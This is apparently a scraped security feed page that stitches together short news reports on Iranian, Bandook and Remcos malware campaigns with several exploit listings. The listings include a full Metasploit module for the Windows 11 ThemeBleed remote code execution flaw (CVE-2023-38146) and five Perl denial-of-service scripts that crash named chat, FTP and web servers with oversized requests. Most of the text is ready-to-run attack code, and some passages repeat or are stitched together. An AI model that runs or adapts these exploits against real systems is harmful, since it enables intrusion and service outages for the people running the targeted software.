The recent wave of cyber attacks targeting Albanian organizations involved the use of a wiper called No-Justice.
The findings come from cybersecurity company ClearSky, which said the Windows-based malware "crashes the operating system in a way that it cannot be rebooted."
The intrusions have been attributed to an Iranian "psychological operation group" called Homeland

The recent wave of cyber attacks targeting Albanian organizations involved the use of a wiper called **No-Justice**.

The findings come from cybersecurity company ClearSky, which said the Windows-based malware "crashes the operating system in a way that it cannot be rebooted."

The intrusions have been attributed to an Iranian "psychological operation group" called Homeland Justice, which has been operating since July 2022, specifically orchestrating destructive attacks against Albania.

On December 24, 2023, the adversary resurfaced after a hiatus, stating it's "back to destroy supporters of terrorists," describing its latest campaign as #DestroyDurresMilitaryCamp. The Albanian city of Durrës currently hosts the dissident group People's Mojahedin Organization of Iran (MEK).

Targets of the attack included ONE Albania, Eagle Mobile Albania, Air Albania, and the Albanian parliament.

Two of the primary tools deployed during the campaign include an executable wiper and a PowerShell script that's designed to propagate the former to other machines in the target network after enabling Windows Remote Management (WinRM).

The No-Justice wiper (NACL.exe) is a 220.34 KB binary that requires administrator privileges to erase the data on the computer.

This is accomplished by removing the boot signature from the Master Boot Record (MBR), which refers to the first sector of any hard disk that identifies where the operating system is located in the disk so that it can be loaded into a computer's RAM.

Also delivered over the course of the attack are legitimate tools like Plink (aka PuTTY Link), RevSocks, and the Windows 2000 resource kit to facilitate reconnaissance, lateral movement, and persistent remote access.

The development comes as pro-Iranian threat actors such as Cyber Av3ngers, Cyber Toufan, Haghjoyan, and YareGomnam Team have increasingly set their sights on Israel and the U.S. amid continuing geopolitical tensions in the Middle East.

"Groups such as Cyber Av3ngers and Cyber Toufan appear to be adopting a narrative of retaliation in their cyber attacks," Check Point disclosed last month.

"By opportunistically targeting U.S. entities using Israeli technology, these hacktivist proxies try to achieve a dual retaliation strategy – claiming to target both Israel and the U.S. in a single, orchestrated cyber assault."

Cyber Toufan, in particular, has been linked to a deluge of hack-and-leak operations targeting over 100 organizations, wiping infected hosts and releasing stolen data on their Telegram channel.

"They've caused so much damage that many of the orgs – almost a third, in fact, haven't been able to recover," security researcher Kevin Beaumont said. "Some of these are still fully offline over a month later, and the wiped victims are a mix of private companies and Israeli state government entities."

Last month, the Israel National Cyber Directorate (INCD) said it's currently tracking roughly 15 hacker groups associated with Iran, Hamas, and Hezbollah that are maliciously operating in Israeli cyberspace since the onset of the Israel-Hamas war in October 2023.

The agency further noted that the techniques and tactics employed share similarities with those used in the Ukraine-Russia war, leveraging psychological warfare and wiper malware to destroy information.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Pro-Iranian Hacker Group Targeting Albania with No-Justice Wiper Malware

When an unpatched Windows 11 host loads a theme file referencing an msstyles file, Windows loads the msstyles file, and if that file's PACKME_VERSION is 999, it then attempts to load an accompanying dll file ending in _vrf.dll. Before loading that file, it verifies that the file is signed. It does this by opening the file for reading and verifying the signature before opening the file for execution. Because this action is performed in two discrete operations, it opens the procedure for a time of check to time of use vulnerability. By embedding a UNC file path to an SMB server we control, the SMB server can serve a legitimate, signed dll when queried for the read, but then serve a different file of the same name when the host intends to load/execute the dll.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::FILEFORMAT  include Msf::Exploit::EXE  include Msf::Exploit::Remote::SMB::Server::Share  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Themebleed- Windows 11 Themes Arbitrary Code Execution CVE-2023-38146',        'Description' => %q{          When an unpatched Windows 11 host loads a theme file referencing an msstyles file, Windows loads the          msstyles file, and if that file's PACKME_VERSION is `999`, it then attempts to load an accompanying dll          file ending in `_vrf.dll` Before loading that file, it verifies that the file is signed.  It does this by          opening the file for reading and verifying the signature before opening the file for execution.          Because this action is performed in two discrete operations, it opens the procedure for a time of check to          time of use vulnerability.  By embedding a UNC file path to an SMB server we control, the SMB server can          serve a legitimate, signed dll when queried for the read, but then serve a different file of the same name          when the host intends to load/execute the dll.        },        'DisclosureDate' => '2023-09-13',        'Author' => [          'gabe_k', # Discovery/PoC          'bwatters-r7', # msf exploit          'Spencer McIntyre' # msf exploit        ],        'References' => [          ['CVE', '2023-38146'],          ['URL', 'https://exploits.forsale/themebleed/'],          ['URL', 'https://github.com/gabe-k/themebleed/tree/main']        ],        'License' => MSF_LICENSE,        'Platform' => 'win',        'Arch' => ARCH_X64,        'Targets' => [          [ 'Windows', {} ],        ],        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS],          'AKA' => ['ThemeBleed']        },        'DefaultOptions' => { 'DisablePayloadHandler' => false }      )    )    register_options([      OptPath.new('STYLE_FILE', [ true, 'The Microsoft-signed .msstyles file (e.g. aero.msstyles).', '' ], regex: /.*\w*\.msstyles$/),      OptString.new('STYLE_FILE_NAME', [ true, 'The name of the style file to reference.', '' ], regex: /^\w*(\.msstyles)?$/),      OptString.new('THEME_FILE_NAME', [ true, 'The name of the theme file to generate.', 'exploit.theme' ])    ])    deregister_options(      'FILENAME', # this is the one used by the FILEFORMAT mixin, replaced by THEME_FILE_NAME for clarity      'FILE_NAME', # this is the one used by the SMB::Server::Share mixin, replaced by STYLE_FILE_NAME for clarity      'FOLDER_NAME'    )  end  def file_format_filename    datastore['THEME_FILE_NAME']  end  def setup    super    @file = File.binread(datastore['STYLE_FILE'])    begin      pe = Rex::PeParsey::Pe.new_from_string(@file)    rescue Rex::PeParsey::PeError => e      fail_with(Failure::BadConfig, "Failed to parse the STYLE_FILE: #{e}")    end    unless pe.resources && (rva = pe.resources['/PACKTHEM_VERSION/0/0']&.rva)      fail_with(Failure::BadConfig, 'The STYLE_FILE has no PACKTHEM_VERSION resource.')    end    @file_version_offset = pe.rva_to_file_offset(rva)    @file_name = datastore['STYLE_FILE_NAME'].blank? ? Rex::Text.rand_text_alpha(rand(4..6)) : datastore['STYLE_FILE_NAME']    @file_name << '.msstyles' unless @file_name.end_with?('.msstyles')  end  def primer    payload_dll = generate_payload_dll    max_length = [payload_dll.length, @file.length].max    # make sure that the lengths are the same by padding the smaller to the length of the larger    @file.ljust(max_length, "\x00".b)    payload_dll.ljust(max_length, "\x00".b)    virtual_disk = service.shares[@share]    @service = service    virtual_file = ThreadLocalVirtualStaticFile.new(virtual_disk, "/#{@file_name}_vrf.dll", @file)    virtual_disk.add(virtual_file)    # install this hook for create requests to set the thread-local file content    virtual_disk.add_hook(RubySMB::SMB2::Packet::CreateRequest) do |_session, request|      next unless request.name.read_now!.encode.ends_with?('_vrf.dll')      if request.desired_access.execute == 1        virtual_file.tl_content = payload_dll      else        virtual_file.tl_content = @file      end      nil    end    file_create(make_theme)  end  def get_file_contents(client:)    print_status("Sending file to #{client.peerhost}")    new_version = [999].pack('v')    @file[0...@file_version_offset] + new_version + @file[(@file_version_offset + new_version.length)...]  end  def make_theme    <<~THEME      [Theme]      DisplayName=@%SystemRoot%\\System32\\themeui.dll,-2060      [Control Panel\\Desktop]      Wallpaper=%SystemRoot%\\web\\wallpaper\\Windows\\img0.jpg      TileWallpaper=0      WallpaperStyle=10      [VisualStyles]      Path=\\\\#{datastore['SRVHOST']}\\#{@share}\\#{@file_name}      ColorStyle=NormalColor      Size=NormalSize      [MasterThemeSelector]      MTSM=RJSPBS    THEME  end  class ThreadLocalVirtualStaticFile < RubySMB::Server::Share::Provider::VirtualDisk::VirtualStaticFile    def initialize(*args, **kwargs)      super      @default_content = @content      @tl_content = {}      @tl_content.compare_by_identity    end    def open(mode = 'r', &block)      @content = tl_content      super    end    def tl_content=(content)      @tl_content[Thread.current] = content    end    def tl_content      @tl_content.fetch(Thread.current, @default_content)    end  endend

Themebleed Windows 11 Themes Arbitrary Code Execution

Easy Chat Server version 3.1 suffers from a denial of service vulnerability.

#!/usr/bin/perl

use Net::FTP;

# Exploit Title: Easy Chat Server 3.1 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 05 january 2024  
# Vendor Homepage:  N/A  
# Download to demo: https://drive.google.com/file/d/1ZbfeaWSEKlpvCG1eUtD0vNnfkNz_8PlE/view  
# Notification vendor: No reported  
# Tested Version:Easy Chat Server 3.1  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://drive.google.com/file/d/1rG6uTXTg3cTg86qmp9rh2ozQfyOV_Av7/view

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data via method GET to web server.  
#The following request sends a large amount of data to the web server to process across method GET, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

    my $payload = "\x90" x 16;  
    $payload = "\x41"x568;

my $buffer = "GET /chat.ghp?username=" . $payload . "&password=&room=2 HTTP/1.1\r\n";  
$buffer .= "User-Agent: Internet Explorer/4.0\r\n";  
$buffer .= "Host: $ip:$port\r\n";  
$buffer .= "Referer: http://$ip\r\n";  
$buffer .= "Connection: Keep-Alive\r\n\r\n";

print("[+] Exploiting...\n");  
my $socket = IO::Socket::INET->new(  
    PeerAddr => $ip,  
    PeerPort => $port,  
    Proto    => 'tcp',  
) or die "Could not connect! Error: $!\n";

$socket->send($buffer);  
close($socket);

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print "#################################################################\n";  
      print "#           Easy Chat Server 3.1 - Denied of Service            #\n";  
      print "#                                                               #\n";  
      print "#                Coded by Fernando Mengali                      #\n";  
      print "#                                                               #\n";  
      print "#              e-mail: fernando.mengalli\@gmail.com             #\n";  
      print "#                                                               #\n";  
      print "#################################################################\n";  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

Easy Chat Server 3.1 Denial Of Service

A new variant of remote access trojan called Bandook has been observed being propagated via phishing attacks with an aim to infiltrate Windows machines, underscoring the continuous evolution of the malware.
Fortinet FortiGuard Labs, which identified the activity in October 2023, said the malware is distributed via a PDF file that embeds a link to a password-protected .7z archive.
“

Malware / Cyber Espionage

A new variant of remote access trojan called **Bandook** has been observed being propagated via phishing attacks with an aim to infiltrate Windows machines, underscoring the continuous evolution of the malware.

Fortinet FortiGuard Labs, which identified the activity in October 2023, said the malware is distributed via a PDF file that embeds a link to a password-protected .7z archive.

"After the victim extracts the malware with the password in the PDF file, the malware injects its payload into msinfo32.exe," security researcher Pei Han Liao said.

Bandook, first detected in 2007, is an off-the-shelf malware that comes with a wide range of features to remotely gain control of the infected systems.

In July 2021, Slovak cybersecurity firm ESET detailed a cyber espionage campaign that leveraged an upgraded variant of Bandook to breach corporate networks in Spanish-speaking countries such as Venezuela.

The starting point of the latest attack sequence is an injector component that's designed to decrypt and load the payload into msinfo32.exe, a legitimate Windows binary that gathers system information to diagnose computer issues.

The malware, besides making Windows Registry changes to establish persistence on the compromised host, establishes contact with a command-and-control (C2) server to retrieve additional payloads and instructions.

"These actions can be roughly categorized as file manipulation, registry manipulation, download, information stealing, file execution, invocation of functions in DLLs from the C2, controlling the victim's computer, process killing, and uninstalling the malware," Han Liao said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Bandook RAT Variant Resurfaces, Targeting Windows Machines

Easy File Sharing FTP Server version 2.0 suffers from a denial of service vulnerability.

#!/usr/bin/perl

use Net::FTP;

# Exploit Title: Easy File Sharing FTP Server 2.0 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 04 january 2024  
# Download to demo: https://drive.google.com/drive/folders/1XISgBk4Zql8NzkWsrzAPOUEqbjJP4hZQ?usp=sharing  
# Notification vendor: No reported  
# Tested Version: Easy File Sharing FTP Server 2.0  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://drive.google.com/drive/folders/1XISgBk4Zql8NzkWsrzAPOUEqbjJP4hZQ?usp=sharing

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server does not correctly handle the amount of data or bytes of the password entered by the user.  
#When authenticating to the FTP server with a long password or a password with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

    my $payload = "\x2c";  
    $payload .= "A"x2000;  
    $payload .= "\x41"x610;

    my $ftp = Net::FTP->new($ip, Debug => 0) or die "Não foi possível se conectar ao servidor: $@";

    $ftp->login("anonymous",$payload) or die "[+] Possibly exploited!";              

    $ftp->quit;

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print "######################################################################\n";  
      print "#         Easy File Sharing FTP Server 2.0 - Denied of Service       #\n";  
      print "#                                                                    #\n";  
      print "#                       Coded by Fernando Mengali                    #\n";  
      print "#                                                                    #\n";  
      print "#                 e-mail: fernando.mengalli\@gmail.com               #\n";  
      print "#                                                                    #\n";  
      print "######################################################################\n";  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

Easy File Sharing FTP Server 2.0 Denial Of Service

The threat actor known as UAC-0050 is leveraging phishing attacks to distribute Remcos RAT using new strategies to evade detection from security software.
"The group's weapon of choice is Remcos RAT, a notorious malware for remote surveillance and control, which has been at the forefront of its espionage arsenal," Uptycs security researchers Karthick Kumar and Shilpesh Trivedi said in

Software Security / Malware

The threat actor known as UAC-0050 is leveraging phishing attacks to distribute Remcos RAT using new strategies to evade detection from security software.

"The group's weapon of choice is Remcos RAT, a notorious malware for remote surveillance and control, which has been at the forefront of its espionage arsenal," Uptycs security researchers Karthick Kumar and Shilpesh Trivedi said in a Wednesday report.

"However, in their latest operational twist, the UAC-0050 group has integrated a pipe method for interprocess communication, showcasing their advanced adaptability."

UAC-0050, active since 2020, has a history of targeting Ukrainian and Polish entities via social engineering campaigns that impersonate legitimate organizations to trick recipients into opening malicious attachments.

In February 2023, the Computer Emergency Response Team of Ukraine (CERT-UA) attributed the adversary to a phishing campaign designed to deliver Remcos RAT.

Over the past few months, the same trojan has been distributed as part of at least three different phishing waves, with one such attack also leading to the deployment of an information stealer called Meduza Stealer.

The analysis from Uptycs is based on a LNK file it discovered on December 21, 2023. While the exact initial access vector is currently unknown, it's suspected to have involved phishing emails targeting Ukrainian military personnel that claim to advertise consultancy roles with the Israel Defense Forces (IDF).

The LNK file in question collects information regarding antivirus products installed on the target computer, and then proceeds to retrieve and execute an HTML application named "6.hta" from a remote server using mshta.exe, a Windows-native binary for running HTA files.

This step paves the way for a PowerShell script that unpacks another PowerShell script to download two files called "word\_update.exe" and "ofer.docx" from the domain new-tech-savvy\[.\]com.

Running word\_update.exe causes it to create a copy of itself with the name fmTask\_dbg.exe and establish persistence by creating a shortcut to the new executable in the Windows Startup folder.

The binary also employs unnamed pipes to facilitate the exchange of data between itself and a newly spawned child process for cmd.exe in order to ultimately decrypt and launch the Remcos RAT (version 4.9.2 Pro), which is capable of harvesting system data and cookies and login information from web browsers like Internet Explorer, Mozilla Firefox, and Google Chrome.

"Leveraging pipes within the Windows operating system provides a covert channel for data transfer, skillfully evading detection by Endpoint Detection and Response (EDR) and antivirus systems," the researchers said.

"Although not entirely new, this technique marks a significant leap in the sophistication of the group's strategies."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

UAC-0050 Group Using New Phishing Tactics to Distribute Remcos RAT

minaliC version 2.0.0 suffers from a denial of service vulnerability.

    #!/usr/bin/perluse Socket;# Exploit Title: minaliC 2.0.0 - Denial of Service (DoS)# Discovery by: Fernando Mengali# Discovery Date: 03 january 2024# Vendor Homepage: http://minalic.sourceforge.net/# Download to demo: https://drive.google.com/file/d/1WoDbps6up2s5Xa40YXDSABRU9J17yRQd/view?usp=sharing# Notification vendor: No reported# Tested Version: minaliC 2.0.0# Tested on: Window XP Professional - Service Pack 2 and 3 - English# Vulnerability Type: Denial of Service (DoS)# Vídeo: https://www.youtube.com/watch?v=R_gkEjvpJNw#1. Description#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).#For this exploit I have tried several strategies to increase reliability and performance:#Jump to a static 'call esp'#Backwards jump to code a known distance from the stack pointer.#The server did not properly handle request with large amounts of data via method GET to web server.#The following request sends a large amount of data to the web server to process across method GET, the server will crash as soon as it is received and processed, causing denial of service conditions.#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.#2. Proof of Concept - PoC    $sis="$^O";    if ($sis eq "windows"){      $cmd="cls";    } else {      $cmd="clear";    }    system("$cmd");        intro();    main();        print "[+] Exploiting... \n";my $junk = "\x41" x 245;my $host = "\x41" x 135;my $i=0;while ($i <= 3) {my $buf = "GET /" . $junk . " HTTP/1.1\r\n" . "Host: " . $host . "\r\n\r\n";my $sock;socket($sock, AF_INET, SOCK_STREAM, 0) or die "[-] Could not create socket: $!\n";my $addr = sockaddr_in($port, inet_aton($ip));connect($sock, $addr);send($sock, $buf, length($buf), 0);$i++;}    print "[+] Done - Exploited success!!!!!\n\n";     sub intro {      print "***************************************************\n";      print "*       minaliC 2.0.0 - Denied of Service         *\n";      print "*                                                 *\n";      print "*            Coded by Fernando Mengali            *\n";      print "*                                                 *\n";      print "*      e-mail: fernando.mengalli\@gmail.com       *\n";      print "*                                                 *\n";      print "***************************************************\n";  }  sub main {our ($ip, $port) = @ARGV;      unless (defined($ip) && defined($port)) {        print "       \nUsage: $0 <ip> <port>                 \n";        exit(-1);      }  }#3. Solution/ How to fix:# This version product is deprecated

minaliC 2.0.0 Denial Of Service

Any unprivileged, local user in Microsoft Windows can disclose whether a specific file, directory or registry key exists in the system or not, even if they do not have the open right to it or enumerate right to its parent.

Microsoft Windows Kernel Information Disclosure

FTPDMIN version 0.96 suffers from a denial of service vulnerability.

#!/usr/bin/perl

use Net::FTP;

# Exploit Title: FTPDMIN 0.96 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 2024-01-01  
# Vendor Homepage: https://www.sentex.ca/~mwandel/ftpdmin/  
# Download to demo:  
https://drive.google.com/file/d/1CpfvaJbJVxR3HPWvcxIVipTaTj7RAaLd/view?usp=sharing  
# Notification vendor: Yes reported  
# Tested Version: FTPDMIN 0.96  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=q-CVJfYdd-g

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2  
and 3 (English).  
#For this exploit I have tried several strategies to increase reliability  
and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data via  
FTP command RNFR.  
#The following request sends a large amount of data to the FTP server to  
process across command RNFR, the server will crash as soon as it is  
received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash  
the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

    intro();  
    main();

    print "[+] Exploiting... \n";

    my $buf = "\x41"x269;  
    my $point = "\x45\x2a\x42\x7b";  
    my $buf2 = "\x41"x126;

    my $payload = "RNFR ".$buf . $point . $buf2;

    my $ftp = Net::FTP->new($ip, Debug => 0) or die "Can't connect to  
server: $@";

    $ftp->login("anonymous",'anonymous');

    $ftp->quot($payload);

    $ftp->quit;

    print "[+] Done - Exploited success!!!!!\n\n";

   sub intro {  
      print "***************************************************\n";  
      print "*         FTPDMIN 0.96 - Denied of Service        *\n";  
      print "*                                                 *\n";  
      print "*            Coded by Fernando Mengali            *\n";  
      print "*                                                 *\n";  
      print "*      e-mail: fernando.mengalli\@gmail.com       *\n";  
      print "*                                                 *\n";  
      print "***************************************************\n";  
  }

  sub main {

      our ($ip) = @ARGV;

      unless (defined($ip)) {

        print "             \nUsage: $0 <ip>                   \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

FTPDMIN 0.96 Denial Of Service

Ultra Mini HTTPd version 1.21 suffers from a denial of service vulnerability.

    # Exploit Title: Ultra Mini HTTPd 1.21 - Denial of Service (DoS)# Discovery by: Fernando Mengali# Discovery Date: 2024-01-01# Vendor Homepage: https://acme.com/# Software Link: https://acme.com/# Notification vendor: Yes reported# Tested Version: Ultra Mini HTTPd 1.21# Tested on: Window XP Professional - Service Pack 2 and 3 - English# Vulnerability Type: Denial of Service (DoS)# Vídeo: https://www.youtube.com/watch?v=HWOGeg3e5As#1. Description#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).#For this exploit I have tried several strategies to increase reliability and performance:#Jump to a static 'call esp'#Backwards jump to code a known distance from the stack pointer.#The server did not properly handle request with large amounts of data via GET.#The following request sends a large amount of data to the web server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.#2. Proof of Concept - PoC    $sis="$^O";    if ($sis eq "windows"){      $cmd="cls";    } else {      $cmd="clear";    }    system("$cmd");        intro();    main();        print "[+] Exploiting... \n";    my $buffer = "\x41"x192;    my $payload = 'A' x 5438 . $buffer;    my $i=0;    while (i < 1) {        my $socket = IO::Socket::INET->new(        PeerAddr => $ip,        PeerPort => $port,        Proto    => 'tcp',    ) or die "Can't connect!!!!! \n\n";    my $payload = "GET / $payload HTTP/1.1\r\nHost:$ip\r\n\r\n";    $socket->send($payload);    close($socket);    $i++;    }      print "[+] Exploited success!!!!!\n\n";     sub intro {      print "***************************************************\n";      print "*    Ultra Mini HTTPd 1.21 - Denied of Service    *\n";      print "*                                                 *\n";      print "*            Coded by Fernando Mengali            *\n";      print "*                                                 *\n";      print "*      e-mail: fernando.mengalli\@gmail.com       *\n";      print "*                                                 *\n";      print "***************************************************\n";  }  sub main {      our ($ip, $port) = @ARGV;      unless (defined($ip) && defined($port)) {        print "       \nUsage: $0 <ip> <port>                 \n";        exit(-1);      }  }#3. Solution/ How to fix:# This version product is deprecated.

Tag

#windows